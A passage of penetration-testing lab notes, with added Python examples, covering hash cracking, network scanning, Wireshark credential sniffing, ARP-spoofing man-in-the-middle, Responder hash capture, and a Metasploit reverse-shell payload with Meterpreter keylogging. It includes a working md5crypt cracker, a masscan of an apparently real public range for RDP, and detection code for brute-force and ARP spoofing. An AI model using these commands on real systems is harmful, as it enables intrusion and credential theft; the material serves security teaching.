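The following Python is an added example, not part of the course and not john's or hashcat's code. It ties the shadow-file procedure above to the hashcat -m 500 line: it parses a shadow entry, reimplements the md5crypt ($1$) algorithm that mode 500 cracks, and runs a wordlist against it, which is exactly the loop john and hashcat perform, minus the speed. The shadow line is constructed (user and date fields are made up); the hash in it is hashcat's published example hash for mode 500, whose plaintext is "hashcat". Current Kali installs default to yescrypt ($y$) hashes, which this block does not implement.

```python
"""Offline dictionary attack on a /etc/shadow entry, doing by hand what john and
hashcat -m 500 do for the md5crypt ($1$) scheme. Standard library only."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASHCAT_MODES = {"$1$": 500, "$5$": 7400, "$6$": 1800}   # crypt(3) prefix -> hashcat -m

# Constructed shadow line: user and date fields are made up; the hash itself is the
# published hashcat example hash for mode 500 (plaintext "hashcat").
SHADOW_LINE = "alice:$1$28772684$iEwNOgGugqO9.bIz5sk8k/:19000:0:99999:7:::"
WORDLIST = ["password", "123456", "letmein", "hashcat", "alice2024"]


def parse_shadow_line(line):
    """Return (user, prefix, salt, digest); locked or empty password fields give None."""
    user, field = line.split(":")[:2]
    if not field or field[0] in "*!":
        return user, None, None, None
    _, scheme, salt, digest = field.split("$", 3)
    return user, "$" + scheme + "$", salt, digest


def _to64(value, chars):
    out = ""
    for _ in range(chars):           # six bits at a time, least significant first
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """crypt(3) $1$ as in FreeBSD/glibc: 1000 MD5 rounds over a password/salt mix.
    Reimplemented here for illustration; the output matches the system crypt()."""
    pw, salt = password.encode(), salt[:8].encode()
    ctx = hashlib.md5(pw + b"$1$" + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    n = len(pw)
    while n > 0:
        ctx.update(alt[:min(16, n)])
        n -= 16
    bit = len(pw)
    while bit:
        ctx.update(b"\0" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):            # the deliberately slow part
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    out = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)))
    return "$1$" + salt.decode() + "$" + out + _to64(final[11], 2)


def dictionary_attack(shadow_line, wordlist):
    """Hash each candidate with the victim's salt and compare; return (user, password or None)."""
    user, prefix, salt, digest = parse_shadow_line(shadow_line)
    if prefix != "$1$":
        raise NotImplementedError(f"only $1$ implemented here (hashcat mode {HASHCAT_MODES.get(prefix)})")
    target = f"$1${salt}${digest}"
    for candidate in wordlist:
        if md5crypt(candidate, salt) == target:
            return user, candidate
    return user, None
```

The salt is read from the hash, never chosen: that is why a wordlist must be re-hashed per user rather than compared against a precomputed table. The 1000-round loop is also why hashcat reports far fewer hashes per second for mode 500 than for raw MD5.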
Practical Lab
Passwd
Changing the root password to '1' using the passwd command.
DNS
Fetching the DNS server used by Kali Linux: look in the file /etc/resolv.conf; the nameserver line
gives the DNS server.
ARP
Scanning the local network with the arp-scan command to populate and view the ARP table on the Kali
machine.
-l    scan the local network (short for --localnet).
Viewing the ARP table on the Windows machine using the arp command.
-a    display the current ARP entries.
Services
We check which services are running on the Linux system with the service command, such as SSH,
FTP, Apache, and more.
service --status-all    list the installed services and their state on the local machine
service ssh start       start the ssh service
service ssh stop        stop the ssh service
service ssh status      check the status of the ssh service
SSH
Install the SSH service on the Linux machine with the apt install command.
After installing SSH, start the service with the service command.
To check which ports are open on the system, use the command netstat -tpan (TCP sockets, owning
program, all states, numeric addresses).
We change the default port of the SSH service by editing /etc/ssh/sshd_config.
As shown in the image, remove the # before Port 22 (line 15 in this file) and change 22 to 2200. After
editing, restart the service so the new port takes effect.
FTP
Install the FTP service using the command apt install vsftpd.
After the installation finishes, start the FTP server.
Nmap
We use the nmap command to search for open ports on a system. Nmap (Network Mapper) is a
command-line tool for network exploration and security auditing.
Nmap flags
-p     scan a specific port (or port range)
-A     aggressive scan: OS detection, version detection, script scanning, and traceroute
-V     print the nmap version number
-v     increase verbosity
-sn    ping scan: host discovery only, no port scan
-sV    probe open ports to determine service/version info
-h     print the help summary for nmap
Masscan
Check for the RDP port 3389 across a range of addresses using the masscan tool.
masscan --range 81.218.120.0-81.218.137.255 -p 3389
--range   IP address range to scan
-p        specific port(s) to scan
Then use the rdesktop command to try to connect to the addresses found.
Log Filtering
Checking for failed connection attempts to the server by viewing /var/log/auth.log. Use the grep
command to filter the file and show only the lines that contain the word "Failed".
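The following Python is an added example, not part of the course, showing the defender's view of the Hydra run from earlier in this module: instead of grepping for "Failed" by eye, it parses sshd lines from auth.log, counts failures per source address, and flags a source that succeeded right after a burst of failures, which is what a cracked password looks like in the log. The log lines are constructed samples in the usual OpenSSH/rsyslog format, not taken from a real host.

```python
"""Detect SSH password guessing (what the hydra run above leaves behind) in auth.log:
count failures per source IP and flag a success that follows a burst of failures."""
import re
from collections import Counter, defaultdict

# Constructed sample lines in OpenSSH/rsyslog format (not taken from a real host).
SAMPLE_AUTH_LOG = """\
Mar  3 10:14:01 kali sshd[1432]: Failed password for root from 10.0.0.25 port 51302 ssh2
Mar  3 10:14:02 kali sshd[1432]: Failed password for root from 10.0.0.25 port 51304 ssh2
Mar  3 10:14:02 kali sshd[1432]: Failed password for root from 10.0.0.25 port 51306 ssh2
Mar  3 10:14:03 kali sshd[1438]: Failed password for invalid user admin from 10.0.0.25 port 51308 ssh2
Mar  3 10:14:03 kali sshd[1440]: Accepted password for root from 10.0.0.25 port 51310 ssh2
Mar  3 10:20:11 kali sshd[1502]: Failed password for bob from 192.168.1.7 port 40022 ssh2
Mar  3 10:20:40 kali sshd[1510]: Accepted publickey for bob from 192.168.1.7 port 40030 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port (?P<port>\d+)"
)


def parse_auth_log(text):
    """Turn sshd login-result lines into dicts; other lines are ignored."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def find_bruteforce(events, threshold=3):
    """Source IPs with at least `threshold` failures, the user names they tried, and
    whether a login from that IP succeeded after reaching the threshold."""
    failures, users, cracked = Counter(), defaultdict(set), set()
    for e in events:
        if e["result"] == "Failed":
            failures[e["ip"]] += 1
            users[e["ip"]].add(e["user"])
        elif failures[e["ip"]] >= threshold:
            cracked.add(e["ip"])
    return {ip: {"failures": n, "users": sorted(users[ip]), "then_succeeded": ip in cracked}
            for ip, n in failures.items() if n >= threshold}
```

Note the "invalid user" form: a plain grep for "Failed password for root" misses guesses against accounts that do not exist, which are the bulk of a wordlist-driven run, so the parser treats both forms alike.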
Apache2
Starting the Apache2 server with the service command, and checking that the Apache2 service is up
with the status command.
Module 5: Diving into Packets
Wireshark
Wireshark is an open-source tool for profiling network traffic and analyzing packets. Packet capture
can provide a network administrator with information about individual packets such as transmit
time, source, destination, protocol type, and header data. Open Wireshark and choose the network
interface to capture on (usually the one showing the most packets in its activity graph).
When we start the capture, every packet passing between the card and the network shows on the
screen. The columns are:
No           The number of the packet, counted from the start of the capture.
Time         Time elapsed since the start of the capture.
Source       IP address of the packet's source (sender).
Destination  IP address of the packet's destination.
Protocol     The protocol used to transfer the packet.
Length       Length of the packet in bytes.
Info         Details of the packet.
The most relevant columns for us are Source, Destination, Protocol, and Info. Different protocols are
marked in different colors. We stop a capture and resume it, or start a new one, using the three icons
in the toolbar: the blue fin on the left starts the capture, the red square stops it, and the green fin
with an arrow clears the screen and starts a new capture.
In the display filter box, use filter expressions to focus on individual packets and search for specific
information, such as connections to the computer, particular ports, information sent in a form, etc.
Non-Secure and Secure Packets
The difference between secure and non-secure packets is data encryption. When traffic is not
encrypted, we can intercept it and read other hosts' credentials on the network. After a POST packet
is located, right-click on it, choose Follow → TCP Stream, and search for the username and password.
We see the username and password in plain text after clicking Follow TCP Stream. This is the
application-layer data (HTTP, the top layer of the OSI model we talked about earlier) carried inside
the TCP stream.
On an HTTPS website, this data is encrypted and cannot be read this way.
Filtering and Parsing
Filtering pcap files in Wireshark helps an analyst extract exactly the data they need from the
network traffic.
To display packets from an IP address:
ip.src == 192.168.221.128
To display packets sent to an IP address:
ip.dst == 192.168.221.128
To combine the first filter and the second (the && operator means "and"):
ip.src == 192.168.221.128 && ip.dst == 64.74.236.127
To show packets to or from a specific TCP port:
tcp.port == 80
Packets sent with the POST method, such as a username and password submitted over http (not https):
http.request.method=="POST" (or "GET")
Another feature to look at is the Statistics menu. It offers many views of the capture that summarize
the traffic exactly the way you need it, for example endpoint statistics.
Extracting Objects
The Export Objects option extracts all the files transferred over a given protocol in the captured
traffic:
File → Export Objects → HTTP
We then get a screen that lets us save any or all of the files to the computer for further analysis.
Practical Lab
Host
To get a domain's IP address (DNS resolution), use the Linux machine's host command.
The arp-scan command lets us search the local network and build the ARP table.
Wireshark
To sniff network activity on the machine, use Wireshark to capture it. Use the filter arp to see ARP
packets.
Other filters, such as dns and dhcp, show the packets of those protocols.
Packets
Analyzing a packet in a given pcap file, we see an attempt to create a TCP connection (a SYN packet)
between 192.168.221.128 and 185.60.216.19.
In the Ethernet layer, we get information about the devices that interact with each other.
In the image, the device labelled VMware_eb tried to establish a TCP connection with the device
labelled VMware_08 (Wireshark replaces the vendor part of a MAC address with the vendor name).
To find the MAC vendor outside Wireshark, search Google for a MAC address lookup site and enter the
address. The vendor in this case is Hewlett Packard, also known as HP. To view the endpoints in the
pcap file, navigate to Statistics -> Endpoints.
We have 66 different IPv4 addresses in the pcap file. To investigate the files transferred over HTTP,
navigate to File -> Export Objects -> HTTP.
Module 6: Windows Network Tools
OS Fingerprinting
Determining what OS a machine or device is running can be helpful for many reasons. The easiest
way of doing passive OS fingerprinting is by looking at the Time to Live (TTL) in the IP header and the
TCP window size in the first packet (the SYN) of a TCP session. First, determine the IP of the machine
on which the pcap file was captured.
The first packet is an NBNS protocol query.
We see that the IP of the requesting machine is 172.16.2.169.
The same machine sent a "GET" request to an external IP. Based on both protocols, we conclude that
the capturing machine's IP address is 192.168.221.128. Now compare the values against those of the
more popular operating systems.
The first method is the TTL method; filter for any packet from that source IP containing a TTL value.
To do so, use the filter ip.src==192.168.221.128 && ip.ttl
Here, the TTL is 64, which indicates that the machine is either Linux (kernel 2.4 and 2.6), Google's
Linux, or FreeBSD; to narrow down the options, we must also test the Window Size method.
To filter window size data, use the same base filter as before for the IP and add the window size
field:
ip.src==172.16.2.169 && tcp.window_size
Detecting Suspicious Traffic
To identify malicious traffic by narrowing down the suspicious packets, use a simple pcap file recorded
on a home computer. Look at the TCP ports in Wireshark by going to Statistics > Endpoints and then
choosing the TCP tab.
We get a list of all IP addresses and ports.
We see that the IP address 192.168.221.128 is connected to the machine using the source port 4444,
which is the default listener port (LPORT) of Metasploit's reverse_tcp payloads generated with
msfvenom. This is an example of how simple filtering and statistics can help us find malicious and
unwanted traffic on the network.
Sanitizing Pcap Files
When capturing network traffic, the capture program sometimes catches irrelevant packets, which
should be removed from the pcap file before it is saved for later research. To do so, go through a
simple process of sanitizing the pcap file.
There are many protocols in the capture file (Statistics > Protocol Hierarchy lists them).
To keep only the NetBIOS protocol and its sub-protocols:
Right-click on NetBIOS → Apply as Filter → Selected
Looking at the bottom right corner, 1924 of the 57998 packets in the pcap file are now displayed.
To export only those packets into a new pcap file, click File → Export Specified Packets.
By default, this menu is set to export the displayed packets.
Save the file to obtain the sanitized pcap.
Module 7: Local Network Attacks
MiTM
A Man-in-the-Middle attack is an active attack in which the adversary inserts itself between two
victims, relaying the messages between them. The victims think they are communicating directly with
each other, but the attacker controls (and can read or alter) the communication.
The requirements for this demonstration are:
• Enabling routing on the attacker machine (Linux)
• The local network interface name of the attacker
• The IP addresses of both victims, usually the victim host and the router
1) Enable routing (packet forwarding) in Linux:
In this way, the attacker machine acts as a router, passing the intercepted traffic on instead of
dropping it. Execute the command in a new terminal.
2) Intercept packets from the victim with arpspoof:
arpspoof is a command-line utility that allows intercepting packets on a switched LAN.
It redirects packets from a target host (or all hosts) on the LAN intended for another host
by forging ARP replies.
The syntax for ARP spoofing is:
arpspoof -i [NETWORK INTERFACE NAME] -t [VICTIM IP] [ROUTER IP]
First Terminal.
3) Intercept packets from the router with arpspoof:
The first terminal intercepts the packets going from the victim to the router. In a second terminal,
you also need to intercept the packets going from the router to the victim, so that both directions
pass through the attacker.
The structure of the command to start intercepting packets from the router to the victim:
arpspoof -i [NETWORK INTERFACE NAME] -t [ROUTER IP] [VICTIM IP]
Second Terminal.
Sniff images from the victim's browsing using driftnet.
Check the other machine's (Windows 10) ARP table to confirm that everything works.
Notice the duplicated MAC address: the router's IP now resolves to the attacker's MAC.
LLMNR Attacks
Start the Responder tool.
The user on the Windows 10 machine tries to access a shared folder and makes a typing mistake in the
name.
The request fails, and the listener (Responder on Kali) captures the user's NTLMv2 hash. This works
because the Windows machine, unable to resolve the mistyped share name through DNS, broadcast an
LLMNR (and NBT-NS) query for it. No real server knew that name, so Responder answered, claiming to
be it. The Windows machine then authenticated to the fake share with NTLMv2, and we captured that
challenge-response.
The logs are stored under /usr/share/responder/logs.
Responder can do much more than basic LLMNR poisoning, for example WPAD poisoning. To crack the
captured hash, use John the Ripper.
Practical Lab
This gives us the ability to sniff the victim's entire network activity, because the attacker forwards all
of the victim's traffic to the router and back. That is why it is called Man In The Middle.
To use the arpspoof command, install dsniff, the package that provides it.
Dsniff
Before choosing a target and initiating an attack, make Kali Linux forward IP packets by changing the
content of the ip_forward file from 0 to 1.
Use this command in the terminal to allow routing on the attacker machine:
echo 1 > /proc/sys/net/ipv4/ip_forward
Find the correct interface to use with arpspoof via the ifconfig command.
Scan for victims in the local network using the arp-scan command. Choose the Windows 7 machine
with the IP 192.168.1.220.
Verify the IP address of the local Windows 10 machine with ipconfig: 192.168.221.157.
Now, start the attack in two terminals with the commands (add -i <interface> if arpspoof does not
pick the right interface by default):
arpspoof -t <RouterIP> <TargetIP>
arpspoof -t <TargetIP> <RouterIP>
arpspoof -t 192.168.221.2 192.168.221.157
arpspoof -t 192.168.221.157 192.168.221.2
Capture the victim's network activity with Wireshark and see the websites visited:
ip.addr==192.168.221.157 && http
After initiating the attack, check for MAC address duplication on the Windows machine with the arp -a
command. A duplicated MAC can indicate that a MiTM attack is occurring at that moment. The image
below shows that the router and the attacker (192.168.221.128) have the same MAC address.
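The following Python is an added example, not part of the course, automating the duplicate-MAC check described above: it parses the ARP table of a host (Windows arp -a or Linux ip neigh output) and reports any address that shares the gateway's hardware address, which is the trace an arpspoof session leaves on the victim. Both table listings are constructed samples using the lab's addresses, and the MAC values are made up.

```python
"""Detect the duplicate-MAC symptom of ARP spoofing from a host's ARP table: after the
arpspoof attack the gateway's IP and the attacker's IP resolve to the same hardware address."""
import re
from collections import defaultdict

# Constructed `arp -a` output from the Windows victim (addresses follow the lab above).
WINDOWS_ARP_A = """\
Interface: 192.168.221.157 --- 0xb
  Internet Address      Physical Address      Type
  192.168.221.2         00-0c-29-eb-1a-3f     dynamic
  192.168.221.128       00-0c-29-eb-1a-3f     dynamic
  192.168.221.254       00-50-56-f3-2c-10     dynamic
  192.168.221.255       ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed `ip neigh` output from a Linux host on the same LAN.
LINUX_IP_NEIGH = """\
192.168.221.2 dev eth0 lladdr 00:0c:29:eb:1a:3f REACHABLE
192.168.221.128 dev eth0 lladdr 00:0c:29:eb:1a:3f STALE
192.168.221.254 dev eth0 lladdr 00:50:56:f3:2c:10 REACHABLE
"""

ENTRY_RE = re.compile(r"(\d+\.\d+\.\d+\.\d+).*?([0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})")


def parse_arp_table(text):
    """Return {ip: mac} with MACs normalised to lower-case colon form. Broadcast and
    multicast entries (group bit set in the first octet) are skipped: they legitimately
    repeat and would only cause false positives."""
    table = {}
    for line in text.splitlines():
        m = ENTRY_RE.search(line)
        if not m:
            continue
        mac = m.group(2).lower().replace("-", ":")
        if int(mac[:2], 16) & 1:
            continue
        table[m.group(1)] = mac
    return table


def duplicate_macs(table):
    """Every MAC that more than one IP resolves to, with those IPs."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def mitm_suspects(text, gateway):
    """IPs sharing the gateway's MAC. A non-empty list means someone is answering ARP
    for the gateway, which is exactly what arpspoof -t <victim> <router> produces."""
    table = parse_arp_table(text)
    gw_mac = table.get(gateway)
    if gw_mac is None:
        return []
    return [ip for ip, mac in table.items() if mac == gw_mac and ip != gateway]
```

Run it against the output of arp -a (or ip neigh) taken before and during the attack; the "before" table has no duplicates, the "during" table names the attacker. The check is only as good as the table's freshness, so compare against the gateway's real MAC recorded from a clean state rather than trusting whichever entry appears first.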
Responder
Use the responder command in Kali Linux to capture credentials quickly. Responder is an LLMNR,
NBT-NS and mDNS poisoner that is easy to use and very effective against vulnerable networks.
-w   start the rogue WPAD proxy server
-b   return Basic HTTP authentication instead of NTLM
-F   force NTLM/Basic authentication on wpad.dat file retrieval (a login prompt)
These flags give Responder the ability to present users with a login screen when they try to browse
the web and to grab the entered credentials in cleartext. Use the -I flag to specify the network
interface on which to listen and poison the other network devices.
Credentials are gained once a Windows system is tricked into communicating with Responder, or when
a user tries to connect to an incorrect shared folder or server.
Responder also captures FTP login attempts, which are sent in cleartext.
Log files for Responder are located in the /usr/share/responder/logs/ directory.
Now, use John to crack the hash.
Cyber Attack Practice
Backdooring
Attackers use backdoors to maintain a foothold on the victim's computer by hiding the backdoor
malware and making it persistent, so that when they need to access the infected system again they can
do so quickly. This lets the attacker bypass security measures and keep privileged access. Most of the
time, backdoor software is a trojan: it starts as a file disguised as legitimate software, and once the
user is tricked into executing it, the attacker uses it as a communication channel. A common way to
make sure the channel never closes is a rootkit, a highly sophisticated malware component that is very
hard to detect. It hides the trojan file, its network traffic, and every other trace of its activity from
you, from the operating system, and from any defensive measure you have, such as a firewall or
antivirus.
At the final stage, a fully operational backdoor is used for several purposes:
• Installing other types of malware
• Remote code execution
• Taking complete control of the computer
• Exfiltrating sensitive data
Metasploit Framework
The Metasploit Framework is an open-source penetration testing and exploit development platform
covering a wide range of applications, operating systems, and platforms. Metasploit is one of the most
commonly used penetration testing tools and comes built into Kali Linux. The main components of
the Metasploit Framework are called modules: standalone pieces of code that provide Metasploit's
functionality. There are six module types: exploits, payloads, auxiliary, nops, post, and encoders; here
we focus on exploits and payloads.
Exploit
An exploit takes advantage of a vulnerability in a system and delivers a payload.
Payload
The payload gives access to the system by various methods (reverse shell, Meterpreter, etc.). The two
basic transport types are:
• Bind TCP
• Reverse TCP
The main difference is who connects to whom.
Bind TCP: the attacker machine connects to the victim. The payload opens a listening port on the
victim's device and allows the attacker to connect to it. However, a machine behind a firewall (or NAT)
usually accepts no inbound connections other than on a few specific ports (80, 443, 22, etc.), so the
attacker often cannot reach the bind port.
Reverse TCP: the victim machine connects back to the attacker. The attacking machine runs a listener
on an open port that receives the incoming connection when the payload is executed. Outbound
connections are usually allowed through NAT and firewalls; if the attacker is remote (across the
internet), port forwarding for the listener port should be configured on the attacker's router.
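The following Python is an added example, not part of the course and not a Metasploit payload: it reduces bind TCP and reverse TCP to the one thing that differs, which side listens and which side connects, using real sockets on loopback. Each side sends one line and reads one line; nothing is executed, so it demonstrates the transport direction and the NAT/firewall reasoning above, not a shell. The port is chosen by the OS (port 0) rather than the 4444 a real LPORT would use, and the "attacker" and "victim" labels are just names for the two ends.

```python
"""Bind TCP versus reverse TCP, reduced to who listens and who connects. Both ends run in
this process on loopback and exchange one line each; nothing is executed, so this shows
the transport direction only, not a shell payload."""
import socket
import threading


def _listen():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))      # port 0: the OS picks a free port (a real LPORT would be e.g. 4444)
    s.listen(1)
    return s


def _serve_one(listener, reply):
    """Accept one peer, read one line, answer with `reply`, return the line received."""
    conn, _ = listener.accept()
    with conn, listener:
        got = conn.makefile("rb").readline().rstrip(b"\n")
        conn.sendall(reply + b"\n")
    return got


def _connect_and_ask(port, line):
    """Connect to a listener, send one line and return the one-line answer."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as c:
        c.sendall(line + b"\n")
        return c.makefile("rb").readline().rstrip(b"\n")


def _exchange(listener_name, connector_name, first_line, reply):
    """Generic one-round exchange; only the role names change between the two demos."""
    listener = _listen()
    port = listener.getsockname()[1]
    received = {}
    t = threading.Thread(target=lambda: received.update(at_listener=_serve_one(listener, reply)))
    t.start()
    at_connector = _connect_and_ask(port, first_line)
    t.join(5)
    return {"listens": listener_name, "connects": connector_name,
            listener_name + "_received": received["at_listener"],
            connector_name + "_received": at_connector}


def bind_tcp_demo():
    """Bind TCP: the VICTIM opens the port and waits; the ATTACKER connects in. This needs
    an inbound path to the victim, which NAT and firewalls usually deny."""
    return _exchange("victim", "attacker", b"attacker: hello", b"victim: ready")


def reverse_tcp_demo():
    """Reverse TCP: the ATTACKER listens (what exploit/multi/handler does) and the VICTIM
    connects out, an outbound connection that NAT and firewalls usually allow."""
    return _exchange("attacker", "victim", b"victim: checking in", b"attacker: ready")
```

The same two functions are the lab that follows in miniature: msfvenom ...reverse_tcp LHOST/LPORT fills in the address the victim side dials, and multi/handler is the listening side. Swap the roles and you have a bind shell, which is why the choice is made at payload-generation time, not afterwards.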
The lab setup:
• Kali Linux (attacker)
• Windows 7 (victim)
• Make sure both virtual machines' network adapters are set to NAT so they can communicate with
  each other
Create the basic reverse payload in the Kali Linux terminal by typing:
msfvenom -p windows/meterpreter/reverse_tcp lhost=<attacker_ip> lport=<listening_port> -f exe -o rev.exe
Create a listener using the multi/handler module inside msfconsole.
Execute the following commands to create a listener for the incoming payload connection:
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST <our IP>
4. set LPORT <port for the listener, e.g. 4444>
5. exploit
Send the payload to the victim via an HTTP server and execute it there. There are many different ways
to deliver a payload; one of them is Python's SimpleHTTPServer module (http.server on Python 3).
Open the server: python -m SimpleHTTPServer 8000
From the Windows machine's browser, type the Linux machine's IP address and the port the server
listens on (8000) in the URL bar. Download the payload and execute it to get control.
Once the victim executes the payload, msfconsole presents the Meterpreter shell, a powerful payload
with many post-exploitation commands to use.
Practical Lab
Payloads
To configure the listener, set the payload, and run the exploit, type:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Use the options command to check the LHOST and LPORT values of the listener, then set the correct
LHOST and LPORT.
After setting the port and the host IP address, execute the run (or exploit) command. Use the help
command to list all the available Meterpreter commands.
To take a screenshot of the victim's screen, use the screenshot command.
The screenshot is saved to the path shown in the output.
Creating a keylogger: the Meterpreter command keyscan_start starts a keystroke sniffer. To dump the
captured keystrokes, use keyscan_dump, and keyscan_stop stops the sniffer.